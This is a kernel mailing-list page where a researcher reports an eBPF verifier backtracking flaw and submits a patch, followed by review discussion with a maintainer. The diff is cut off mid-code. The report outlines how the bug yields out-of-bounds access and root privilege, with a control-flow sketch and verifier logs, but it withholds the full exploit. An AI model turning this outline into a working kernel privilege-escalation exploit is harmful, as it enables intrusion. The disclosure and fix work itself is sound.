diff mbox series

Incorrect backtracking for load/store or atomic ops

Message ID 20231020155842.130257-1-tao.lyu@epfl.ch (mailing list archive)
State Changes Requested
Delegated to: BPF
Headers show
Series Incorrect backtracking for load/store or atomic ops | expand

Checks

Context Check Description
netdev/tree_selection success Not a local patch, async
bpf/vmtest-bpf-next-PR success PR summary
bpf/vmtest-bpf-next-VM_Test-1 success Logs for build for aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-3 success Logs for build for x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-5 success Logs for set-matrix
bpf/vmtest-bpf-next-VM_Test-2 success Logs for build for s390x with gcc
bpf/vmtest-bpf-next-VM_Test-4 success Logs for build for x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-7 success Logs for test_maps on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-9 success Logs for test_maps on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-6 success Logs for test_maps on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-11 success Logs for test_progs on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-8 success Logs for test_maps on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-10 success Logs for test_progs on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-14 success Logs for test_progs_no_alu32 on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-13 success Logs for test_progs on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-12 success Logs for test_progs on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-15 success Logs for test_progs_no_alu32 on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-17 success Logs for test_progs_no_alu32 on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-18 success Logs for test_progs_no_alu32_parallel on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-16 success Logs for test_progs_no_alu32 on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-19 success Logs for test_progs_no_alu32_parallel on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-20 success Logs for test_progs_no_alu32_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-22 success Logs for test_progs_parallel on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-21 success Logs for test_progs_parallel on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-23 success Logs for test_progs_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-24 fail Logs for test_verifier on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-26 fail Logs for test_verifier on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-27 fail Logs for test_verifier on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-28 success Logs for veristat
bpf/vmtest-bpf-next-VM_Test-25 fail Logs for test_verifier on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-0 success Logs for ShellCheck

Commit Message

Tao Lyu Oct. 20, 2023, 3:58 p.m. UTC
Hi,

I found the backtracking logic of the eBPF verifier is flawed
when meeting 1) normal load and store instruction or
2) atomic memory instructions.

# Normal load and store

Here, I show one case about the normal load and store instructions,
which can be exploited to achieve arbitrary read and write with two requirements:
1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
the Spectre mitigation in the eBPF verifier will prevent exploitation.

                                   1: r3 = r10 (stack pointer)
                                   3:           if cond
                                                 /           \
                                               /                \
        4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
                 verification state 1                  verification state 2 (prune point)
                                              \                  /
                                                \              /
                                      7:  r6 = *(u64 *)(r1 -120)
                                                         ...
                                    17:    r7 = a map pointer
                                    18:            r7 += r6
                         // Out-of-bound access from the right side path

Give an eBPF program (tools/testing/selftests/bpf/test_precise.c) 
whose simplified control flow graph looks like the above.
When the verifier goes through the first (left-side) path and reaches insn 18,
it will backtrack on register 6 like below.

18: (0f) r7 += r6
mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1 
mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
...
mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)

However, the backtracking process is problematic when it reaches insn 7.
Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
Afterward, the backtracking finishes without annotating any registers in any verifier states.

    else if (class == BPF_LDX) {
        if (!bt_is_reg_set(bt, dreg))
            return 0;
        bt_clear_reg(bt, dreg);
        if (insn->src_reg != BPF_REG_FP)
            return 0;
        ...
   }

Finally, when the second (left-side) path reaches insn 7 again,
it will compare the verifier states with the previous one.
However, it realizes these two states are equal because no precision is on r6,
thus the eBPF program an easily pass the verifier
although the second path contains an invalid access offset.
We have successfully exploited this bug for getting the root privilege.
If needed, we can share the exploitation.
BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
"[ 1510.165537] verifier backtracking bug
[ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"



IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.
However, it might need too much code addition.
Or we just do not clear the precision on the src register. 

# Atomic memory instructions

Then, I show that the backtracking on atomic load and store is also flawed.
As shown below, when the backtrack_insn() function in the verifier meets store instructions,
it checks if the stack slot is set with precision or not. If not, just return. 

            if (!bt_is_slot_set(bt, spi))
                return 0;
            bt_clear_slot(bt, spi);
            if (class == BPF_STX)
                bt_set_reg(bt, sreg);

Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.

7: (4c) w7 |= w3
mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1 
mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
BUG regs 400

Before backtracking to it, r7 has already been marked as precise.
Since the value of r7 after atomic_fecth_or comes from r10-120,
it should propagate the precision to r10-120.
However, because the stack slot r10-120 is not marked,
it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
Finally, it just returns without marking r10-120 as precise. 

This bug can lead to the verifier's assertion as well:
"[ 1510.165537] verifier backtracking bug
[ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"

I've attached the patch for correctly propagating the precision on atomic instructions.
But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.

Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
---
 kernel/bpf/verifier.c                         |  58 +++++-
 tools/testing/selftests/bpf/Makefile          |   6 +-
 tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
 .../selftests/bpf/verifier/atomic_precision.c |  19 ++
 4 files changed, 263 insertions(+), 6 deletions(-)
 create mode 100644 tools/testing/selftests/bpf/test_precise.c
 create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c

Comments

Andrii Nakryiko Oct. 22, 2023, 4:59 a.m. UTC | #1
On Fri, Oct 20, 2023 at 9:06 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
>
> Hi,
>
> I found the backtracking logic of the eBPF verifier is flawed
> when meeting 1) normal load and store instruction or
> 2) atomic memory instructions.
>
> # Normal load and store
>
> Here, I show one case about the normal load and store instructions,
> which can be exploited to achieve arbitrary read and write with two requirements:
> 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
> 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
> the Spectre mitigation in the eBPF verifier will prevent exploitation.
>
>                                    1: r3 = r10 (stack pointer)
>                                    3:           if cond
>                                                  /           \
>                                                /                \
>         4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
>                  verification state 1                  verification state 2 (prune point)
>                                               \                  /
>                                                 \              /
>                                       7:  r6 = *(u64 *)(r1 -120)
>                                                          ...
>                                     17:    r7 = a map pointer
>                                     18:            r7 += r6
>                          // Out-of-bound access from the right side path
>
> Give an eBPF program (tools/testing/selftests/bpf/test_precise.c)
> whose simplified control flow graph looks like the above.
> When the verifier goes through the first (left-side) path and reaches insn 18,
> it will backtrack on register 6 like below.
>
> 18: (0f) r7 += r6
> mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1
> mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
> ...
> mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)
>
> However, the backtracking process is problematic when it reaches insn 7.
> Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
> ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
> Afterward, the backtracking finishes without annotating any registers in any verifier states.
>
>     else if (class == BPF_LDX) {
>         if (!bt_is_reg_set(bt, dreg))
>             return 0;
>         bt_clear_reg(bt, dreg);
>         if (insn->src_reg != BPF_REG_FP)
>             return 0;
>         ...
>    }
>
> Finally, when the second (left-side) path reaches insn 7 again,
> it will compare the verifier states with the previous one.
> However, it realizes these two states are equal because no precision is on r6,
> thus the eBPF program an easily pass the verifier
> although the second path contains an invalid access offset.
> We have successfully exploited this bug for getting the root privilege.
> If needed, we can share the exploitation.
> BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
> "[ 1510.165537] verifier backtracking bug
> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>
>
>
> IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.

Yes!

> However, it might need too much code addition.

No :) I don't think it's a lot of code. I've been meaning to tackle
this for a while, but perhaps the time is now.

The plan is to use jmp_history to record an extra flags for some
instructions (even if they are not jumps). Like in this case, we can
remember for LDX and STX instructions that they were doing register
load/spill, and take that into account during backtrack_insn() without
having to guess based on r10.

I have part of this ready locally, I'll try to finish this up in a
next week or two. Stay tuned (unless you want to tackle that
yourself).

> Or we just do not clear the precision on the src register.
>
> # Atomic memory instructions
>
> Then, I show that the backtracking on atomic load and store is also flawed.
> As shown below, when the backtrack_insn() function in the verifier meets store instructions,
> it checks if the stack slot is set with precision or not. If not, just return.
>
>             if (!bt_is_slot_set(bt, spi))
>                 return 0;
>             bt_clear_slot(bt, spi);
>             if (class == BPF_STX)
>                 bt_set_reg(bt, sreg);
>
> Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.
>
> 7: (4c) w7 |= w3
> mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1
> mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
> mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
> mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
> mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
> mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
> mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
> BUG regs 400
>
> Before backtracking to it, r7 has already been marked as precise.
> Since the value of r7 after atomic_fecth_or comes from r10-120,
> it should propagate the precision to r10-120.
> However, because the stack slot r10-120 is not marked,
> it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
> Finally, it just returns without marking r10-120 as precise.

this seems like the same issue with not recognizing stack access
through any other register but r10?

Or is there something specific to atomic instructions here? I'm not
very familiar with them, so I'll need to analyse the code first.

>
> This bug can lead to the verifier's assertion as well:
> "[ 1510.165537] verifier backtracking bug
> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>
> I've attached the patch for correctly propagating the precision on atomic instructions.
> But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.

I can try to solve stack access through non-r10, but it would be very
useful if you could provide tests that trigger the above situations
you described. Your test_precise.c test below is not the right way to
add tests, it adds a new binary and generally doesn't fit into
existing set of tests inside test_progs. Please see
progs/verifier_xadd.c and prog_tests/verifier.c and try to convert
your tests into that form (you also will be able to use inline
assembly instead of painful BPF_xxx() instruction macros).

Thanks.

>
> Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
> ---
>  kernel/bpf/verifier.c                         |  58 +++++-
>  tools/testing/selftests/bpf/Makefile          |   6 +-
>  tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
>  .../selftests/bpf/verifier/atomic_precision.c |  19 ++
>  4 files changed, 263 insertions(+), 6 deletions(-)
>  create mode 100644 tools/testing/selftests/bpf/test_precise.c
>  create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c
>

[...]
Tao Lyu Oct. 23, 2023, 10:12 a.m. UTC | #2

> On Fri, Oct 20, 2023 at 9:06 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
>>
>> Hi,
>>
>> I found the backtracking logic of the eBPF verifier is flawed
>> when meeting 1) normal load and store instruction or
>> 2) atomic memory instructions.
>>
>> # Normal load and store
>>
>> Here, I show one case about the normal load and store instructions,
>> which can be exploited to achieve arbitrary read and write with two requirements:
>> 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
>> 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
>> the Spectre mitigation in the eBPF verifier will prevent exploitation.
>>
>>                                    1: r3 = r10 (stack pointer)
>>                                    3:           if cond
>>                                                  /           \
>>                                                /                \
>>         4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
>>                  verification state 1                  verification state 2 (prune point)
>>                                               \                  /
>>                                                 \              /
>>                                       7:  r6 = *(u64 *)(r1 -120)
>>                                                          ...
>>                                     17:    r7 = a map pointer
>>                                     18:            r7 += r6
>>                          // Out-of-bound access from the right side path
>>
>> Give an eBPF program (tools/testing/selftests/bpf/test_precise.c)
>> whose simplified control flow graph looks like the above.
>> When the verifier goes through the first (left-side) path and reaches insn 18,
>> it will backtrack on register 6 like below.
>>
>> 18: (0f) r7 += r6
>> mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1
>> mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
>> ...
>> mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)
>>
>> However, the backtracking process is problematic when it reaches insn 7.
>> Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
>> ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
>> Afterward, the backtracking finishes without annotating any registers in any verifier states.
>>
>>     else if (class == BPF_LDX) {
>>         if (!bt_is_reg_set(bt, dreg))
>>             return 0;
>>         bt_clear_reg(bt, dreg);
>>         if (insn->src_reg != BPF_REG_FP)
>>             return 0;
>>         ...
>>    }
>>
>> Finally, when the second (left-side) path reaches insn 7 again,
>> it will compare the verifier states with the previous one.
>> However, it realizes these two states are equal because no precision is on r6,
>> thus the eBPF program an easily pass the verifier
>> although the second path contains an invalid access offset.
>> We have successfully exploited this bug for getting the root privilege.
>> If needed, we can share the exploitation.
>> BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
>> "[ 1510.165537] verifier backtracking bug
>> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>>
>>
>>
>> IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.
>
> Yes!
>
>> However, it might need too much code addition.
>
> No :) I don't think it's a lot of code. I've been meaning to tackle
> this for a while, but perhaps the time is now.
>
> The plan is to use jmp_history to record an extra flags for some
> instructions (even if they are not jumps). Like in this case, we can
> remember for LDX and STX instructions that they were doing register
> load/spill, and take that into account during backtrack_insn() without
> having to guess based on r10.
>
> I have part of this ready locally, I'll try to finish this up in a
> next week or two. Stay tuned (unless you want to tackle that
> yourself).

Great! I'll keep focus on this.

>
>> Or we just do not clear the precision on the src register.
>>
>> # Atomic memory instructions
>>
>> Then, I show that the backtracking on atomic load and store is also flawed.
>> As shown below, when the backtrack_insn() function in the verifier meets store instructions,
>> it checks if the stack slot is set with precision or not. If not, just return.
>>
>>             if (!bt_is_slot_set(bt, spi))
>>                 return 0;
>>             bt_clear_slot(bt, spi);
>>             if (class == BPF_STX)
>>                 bt_set_reg(bt, sreg);
>>
>> Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.
>>
>> 7: (4c) w7 |= w3
>> mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1
>> mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
>> mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
>> mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
>> mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
>> mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
>> mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
>> BUG regs 400
>>
>> Before backtracking to it, r7 has already been marked as precise.
>> Since the value of r7 after atomic_fecth_or comes from r10-120,
>> it should propagate the precision to r10-120.
>> However, because the stack slot r10-120 is not marked,
>> it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
>> Finally, it just returns without marking r10-120 as precise.
>
> this seems like the same issue with not recognizing stack access
> through any other register but r10?
>
> Or is there something specific to atomic instructions here? I'm not
> very familiar with them, so I'll need to analyse the code first.

The non-recognizing stack access through other non-r10 registers can also affect atomic instructions as atomic instructions are also memory store instructions.

But there is another aspect, that atomi ops has much complex/different semantic compared to memory store instructions. However, the backtracking logic didn't take care of it.

For example, insn r7 = atomic_fetch_or((u32 *)(r10 -120), r7) will load the original value at r10-120 to the final r7, and store the "or" result of the value at r10-120 and original r7.

Case 1: Assume r7 is marked as precise and then the backtracking code meets this instruction, it should propagate the precision to the stack slot r10-120.

Case 2: Assume r10-120 is marked as precise, after this instruction, r10-120 and r7 should both be marked precise.

>
>>
>> This bug can lead to the verifier's assertion as well:
>> "[ 1510.165537] verifier backtracking bug
>> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>>
>> I've attached the patch for correctly propagating the precision on atomic instructions.
>> But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.
>
> I can try to solve stack access through non-r10, but it would be very
> useful if you could provide tests that trigger the above situations
> you described. Your test_precise.c test below is not the right way to
> add tests, it adds a new binary and generally doesn't fit into
> existing set of tests inside test_progs. Please see
> progs/verifier_xadd.c and prog_tests/verifier.c and try to convert
> your tests into that form (you also will be able to use inline
> assembly instead of painful BPF_xxx() instruction macros).
>
> Thanks.

Sure. I'll re-construct the test case may the end of this week because I'm attending a conference SOSP this week.

>
>>
>> Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
>> ---
>>  kernel/bpf/verifier.c                         |  58 +++++-
>>  tools/testing/selftests/bpf/Makefile          |   6 +-
>>  tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
>>  .../selftests/bpf/verifier/atomic_precision.c |  19 ++
>>  4 files changed, 263 insertions(+), 6 deletions(-)
>>  create mode 100644 tools/testing/selftests/bpf/test_precise.c
>>  create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c
>>
>
>[...]
Andrii Nakryiko Oct. 23, 2023, 5:06 p.m. UTC | #3
On Mon, Oct 23, 2023 at 3:12 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
>
> >
> > On Fri, Oct 20, 2023 at 9:06 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
> >>
> >> Hi,
> >>
> >> I found the backtracking logic of the eBPF verifier is flawed
> >> when meeting 1) normal load and store instruction or
> >> 2) atomic memory instructions.
> >>
> >> # Normal load and store
> >>
> >> Here, I show one case about the normal load and store instructions,
> >> which can be exploited to achieve arbitrary read and write with two requirements:
> >> 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
> >> 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
> >> the Spectre mitigation in the eBPF verifier will prevent exploitation.
> >>
> >>                                    1: r3 = r10 (stack pointer)
> >>                                    3:           if cond
> >>                                                  /           \
> >>                                                /                \
> >>         4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
> >>                  verification state 1                  verification state 2 (prune point)
> >>                                               \                  /
> >>                                                 \              /
> >>                                       7:  r6 = *(u64 *)(r1 -120)
> >>                                                          ...
> >>                                     17:    r7 = a map pointer
> >>                                     18:            r7 += r6
> >>                          // Out-of-bound access from the right side path
> >>
> >> Give an eBPF program (tools/testing/selftests/bpf/test_precise.c)
> >> whose simplified control flow graph looks like the above.
> >> When the verifier goes through the first (left-side) path and reaches insn 18,
> >> it will backtrack on register 6 like below.
> >>
> >> 18: (0f) r7 += r6
> >> mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1
> >> mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
> >> ...
> >> mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)
> >>
> >> However, the backtracking process is problematic when it reaches insn 7.
> >> Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
> >> ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
> >> Afterward, the backtracking finishes without annotating any registers in any verifier states.
> >>
> >>     else if (class == BPF_LDX) {
> >>         if (!bt_is_reg_set(bt, dreg))
> >>             return 0;
> >>         bt_clear_reg(bt, dreg);
> >>         if (insn->src_reg != BPF_REG_FP)
> >>             return 0;
> >>         ...
> >>    }
> >>
> >> Finally, when the second (left-side) path reaches insn 7 again,
> >> it will compare the verifier states with the previous one.
> >> However, it realizes these two states are equal because no precision is on r6,
> >> thus the eBPF program an easily pass the verifier
> >> although the second path contains an invalid access offset.
> >> We have successfully exploited this bug for getting the root privilege.
> >> If needed, we can share the exploitation.
> >> BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
> >> "[ 1510.165537] verifier backtracking bug
> >> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
> >>
> >>
> >>
> >> IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.
> >
> > Yes!
> >
> >> However, it might need too much code addition.
> >
> > No :) I don't think it's a lot of code. I've been meaning to tackle
> > this for a while, but perhaps the time is now.
> >
> > The plan is to use jmp_history to record an extra flags for some
> > instructions (even if they are not jumps). Like in this case, we can
> > remember for LDX and STX instructions that they were doing register
> > load/spill, and take that into account during backtrack_insn() without
> > having to guess based on r10.
> >
> > I have part of this ready locally, I'll try to finish this up in a
> > next week or two. Stay tuned (unless you want to tackle that
> > yourself).
>
> Great! I'll keep focus on this.
>
> >
> >> Or we just do not clear the precision on the src register.
> >>
> >> # Atomic memory instructions
> >>
> >> Then, I show that the backtracking on atomic load and store is also flawed.
> >> As shown below, when the backtrack_insn() function in the verifier meets store instructions,
> >> it checks if the stack slot is set with precision or not. If not, just return.
> >>
> >>             if (!bt_is_slot_set(bt, spi))
> >>                 return 0;
> >>             bt_clear_slot(bt, spi);
> >>             if (class == BPF_STX)
> >>                 bt_set_reg(bt, sreg);
> >>
> >> Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.
> >>
> >> 7: (4c) w7 |= w3
> >> mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1
> >> mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
> >> mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
> >> mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
> >> mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
> >> mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
> >> mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
> >> BUG regs 400
> >>
> >> Before backtracking to it, r7 has already been marked as precise.
> >> Since the value of r7 after atomic_fecth_or comes from r10-120,
> >> it should propagate the precision to r10-120.
> >> However, because the stack slot r10-120 is not marked,
> >> it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
> >> Finally, it just returns without marking r10-120 as precise.
> >
> > this seems like the same issue with not recognizing stack access
> > through any other register but r10?
> >
> > Or is there something specific to atomic instructions here? I'm not
> > very familiar with them, so I'll need to analyse the code first.
>
> The non-recognizing stack access through other non-r10 registers can also affect atomic instructions as atomic instructions are also memory store instructions.
>
> But there is another aspect, that atomi ops has much complex/different semantic compared to memory store instructions. However, the backtracking logic didn't take care of it.
>
> For example, insn r7 = atomic_fetch_or((u32 *)(r10 -120), r7) will load the original value at r10-120 to the final r7, and store the "or" result of the value at r10-120 and original r7.
>
> Case 1: Assume r7 is marked as precise and then the backtracking code meets this instruction, it should propagate the precision to the stack slot r10-120.
>
> Case 2: Assume r10-120 is marked as precise, after this instruction, r10-120 and r7 should both be marked precise.
>

So generally speaking atomic operation's memory argument can't be
precise as it is supposed to be modified by other CPUs simultaneously,
so we can never be sure about its actual value.

But using stack pointer is kind of a special case where atomicity
doesn't matter because no one should be accessing stack from another
CPU. So perhaps we can special case this.

Either way, I'm going to concentrate on more generally recognize stack
access for any instruction, and we can work on fixing atomic-specific
semantics on top of that separately.

> >
> >>
> >> This bug can lead to the verifier's assertion as well:
> >> "[ 1510.165537] verifier backtracking bug
> >> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
> >>
> >> I've attached the patch for correctly propagating the precision on atomic instructions.
> >> But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.
> >
> > I can try to solve stack access through non-r10, but it would be very
> > useful if you could provide tests that trigger the above situations
> > you described. Your test_precise.c test below is not the right way to
> > add tests, it adds a new binary and generally doesn't fit into
> > existing set of tests inside test_progs. Please see
> > progs/verifier_xadd.c and prog_tests/verifier.c and try to convert
> > your tests into that form (you also will be able to use inline
> > assembly instead of painful BPF_xxx() instruction macros).
> >
> > Thanks.
>
> Sure. I'll re-construct the test case may the end of this week because I'm attending a conference SOSP this week.

Sounds good, thanks.

>
> >
> >>
> >> Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
> >> ---
> >>  kernel/bpf/verifier.c                         |  58 +++++-
> >>  tools/testing/selftests/bpf/Makefile          |   6 +-
> >>  tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
> >>  .../selftests/bpf/verifier/atomic_precision.c |  19 ++
> >>  4 files changed, 263 insertions(+), 6 deletions(-)
> >>  create mode 100644 tools/testing/selftests/bpf/test_precise.c
> >>  create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c
> >>
> >
> >[...]
diff mbox series

Patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index e777f50401b6..4e86cd2cadd3 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -3495,6 +3495,7 @@  static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx,
 	u32 dreg = insn->dst_reg;
 	u32 sreg = insn->src_reg;
 	u32 spi, i;
+	u32 set_spi, set_sreg;
 
 	if (insn->code == 0)
 		return 0;
@@ -3512,6 +3513,11 @@  static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx,
 		if (!bt_is_reg_set(bt, dreg))
 			return 0;
 		if (opcode == BPF_MOV) {
+			if (dreg == BPF_REG_FP || sreg == BPF_REG_FP) {
+				verbose(env, "BUG: backtracking to r10\n");
+				WARN_ONCE(1, "verifier backtracking bug");
+				return -EFAULT;
+			}
 			if (BPF_SRC(insn->code) == BPF_X) {
 				/* dreg = sreg or dreg = (s8, s16, s32)sreg
 				 * dreg needs precision after this insn
@@ -3580,11 +3586,53 @@  static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx,
 			WARN_ONCE(1, "verifier backtracking bug");
 			return -EFAULT;
 		}
-		if (!bt_is_slot_set(bt, spi))
-			return 0;
-		bt_clear_slot(bt, spi);
-		if (class == BPF_STX)
-			bt_set_reg(bt, sreg);
+		if (BPF_MODE(insn->code) == BPF_ATOMIC) {
+			switch (insn->imm) {
+				case BPF_ADD:
+				case BPF_AND:
+				case BPF_OR:
+				case BPF_XOR:
+					if (bt_is_slot_set(bt, spi)) {
+						bt_set_reg(bt, sreg);
+					}
+					break;
+				case BPF_ADD | BPF_FETCH:
+				case BPF_AND | BPF_FETCH:
+				case BPF_OR | BPF_FETCH:
+				case BPF_XOR | BPF_FETCH:
+					set_spi = bt_is_reg_set(bt, sreg);
+					set_sreg = bt_is_slot_set(bt, spi);
+					if (set_spi) {
+						bt_set_slot(bt, spi);
+						bt_clear_reg(bt, sreg);
+					}
+					if (set_sreg) {
+						bt_set_slot(bt, spi);
+						bt_set_reg(bt, sreg);
+					}
+					break;
+				case BPF_XCHG:
+				case BPF_CMPXCHG:
+					if (bt_is_reg_set(bt, sreg) && bt_is_slot_set(bt, spi))
+						return 0;
